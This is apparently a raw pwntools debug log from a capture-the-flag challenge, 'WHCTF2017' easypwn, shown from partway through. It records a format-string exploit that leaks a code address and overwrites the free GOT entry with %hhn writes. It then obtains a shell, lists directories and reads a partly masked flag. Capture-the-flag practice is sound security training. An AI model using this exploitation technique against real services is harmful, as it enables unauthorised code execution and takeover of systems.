    b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%396$p\n'
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x421 bytes:
    b'Your Input Is :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%396$p\n'
    b'0x55e0a5c1ada0\n'
    b'\n'
    b'Input Your Code:\n'
[*] init_real_addr: 0x55e0a5c1ada0
[*] free_got_addr: 0x55e0a5e1c018
b'bb%146c%133$hhnA'
146 69 66
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003e0  61 61 61 61  61 61 61 61  62 62 25 31  34 36 63 25  │aaaa│aaaa│bb%1│46c%│
    000003f0  31 33 33 24  68 68 6e 41  18 c0 e1 a5  e0 55 00 00  │133$│hhnA│····│·U··│
    00000400  0a                                                  │·│
    00000401
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x4a4 bytes:
    00000000  59 6f 75 72  20 49 6e 70  75 74 20 49  73 20 3a 61  │Your│ Inp│ut I│s :a│
    00000010  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003f0  61 61 61 61  61 61 61 62  62 25 31 34  36 63 25 31  │aaaa│aaab│b%14│6c%1│
    00000400  33 33 24 68  68 6e 41 18  c0 e1 a5 e0  55 20 20 20  │33$h│hnA·│····│U   │
    00000410  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
    *
    00000490  20 20 20 20  20 20 20 20  20 20 20 20  20 20 0a 49  │    │    │    │  ·I│
    000004a0  6e 70 75 74                                         │nput│
    000004a4
[DEBUG] Received 0xc bytes:
    b' Your Code:\n'
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003e0  61 61 61 61  61 61 61 61  62 62 25 36  39 63 25 31  │aaaa│aaaa│bb%6│9c%1│
    000003f0  33 33 24 68  68 6e 41 41  19 c0 e1 a5  e0 55 00 00  │33$h│hnAA│····│·U··│
    00000400  0a                                                  │·│
    00000401
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x463 bytes:
    00000000  59 6f 75 72  20 49 6e 70  75 74 20 49  73 20 3a 61  │Your│ Inp│ut I│s :a│
    00000010  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003f0  61 61 61 61  61 61 61 62  62 25 36 39  63 25 31 33  │aaaa│aaab│b%69│c%13│
    00000400  33 24 68 68  6e 41 41 19  c0 e1 a5 e0  55 20 20 20  │3$hh│nAA·│····│U   │
    00000410  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
    *
    00000450  20 0a 49 6e  70 75 74 20  59 6f 75 72  20 43 6f 64  │ ·In│put │Your│ Cod│
    00000460  65 3a 0a                                            │e:·│
    00000463
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003e0  61 61 61 61  61 61 61 61  62 62 25 36  36 63 25 31  │aaaa│aaaa│bb%6│6c%1│
    000003f0  33 33 24 68  68 6e 41 41  1a c0 e1 a5  e0 55 00 00  │33$h│hnAA│····│·U··│
    00000400  0a                                                  │·│
    00000401
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x460 bytes:
    00000000  59 6f 75 72  20 49 6e 70  75 74 20 49  73 20 3a 61  │Your│ Inp│ut I│s :a│
    00000010  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003f0  61 61 61 61  61 61 61 62  62 25 36 36  63 25 31 33  │aaaa│aaab│b%66│c%13│
    00000400  33 24 68 68  6e 41 41 1a  c0 e1 a5 e0  55 20 20 20  │3$hh│nAA·│····│U   │
    00000410  20 20 20 20  20 20 20 20  20 20 20 20  20 20 20 20  │    │    │    │    │
    *
    00000440  20 20 20 20  20 20 20 20  20 20 20 20  20 20 0a 49  │    │    │    │  ·I│
    00000450  6e 70 75 74  20 59 6f 75  72 20 43 6f  64 65 3a 0a  │nput│ You│r Co│de:·│
    00000460
[DEBUG] Sent 0x2 bytes:
    b'2\n'
[DEBUG] Received 0x11 bytes:
    b'Input Your Name:\n'
[DEBUG] Sent 0x8 bytes:
    b'/bin/sh\n'
[*] Switching to interactive mode

[DEBUG] Received 0x21 bytes:
    b'OK!I Know Your Name :/bin/sh\n'
    b'Now!'
OK!I Know Your Name :/bin/sh
Now!$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x64 bytes:
    b'bin\n'
    b'boot\n'
    b'dev\n'
    b'etc\n'
    b'home\n'
    b'lib\n'
    b'lib32\n'
    b'lib64\n'
    b'media\n'
    b'mnt\n'
    b'opt\n'
    b'proc\n'
    b'root\n'
    b'run\n'
    b'sbin\n'
    b'srv\n'
    b'start.sh\n'
    b'sys\n'
    b'tmp\n'
    b'usr\n'
    b'var\n'
bin
boot
dev
etc
home
lib
lib32
lib64
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x5 bytes:
    b'cat: '
cat: [DEBUG] Received 0x20 bytes:
    b'flag: No such file or directory\n'
flag: No such file or directory
$ cd home
[DEBUG] Sent 0x8 bytes:
    b'cd home\n'
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x5 bytes:
    b'xctf\n'
xctf
$ cd xctf
[DEBUG] Sent 0x8 bytes:
    b'cd xctf\n'
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x25 bytes:
    b'bin\n'
    b'dev\n'
    b'easypwn\n'
    b'flag\n'
    b'lib\n'
    b'lib32\n'
    b'lib64\n'
bin
dev
easypwn
flag
lib
lib32
lib64
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x2d bytes:
    b'cyberpeace{************************c97f2888818ecf}\n'
cyberpeace{************************c97f2888818ecf}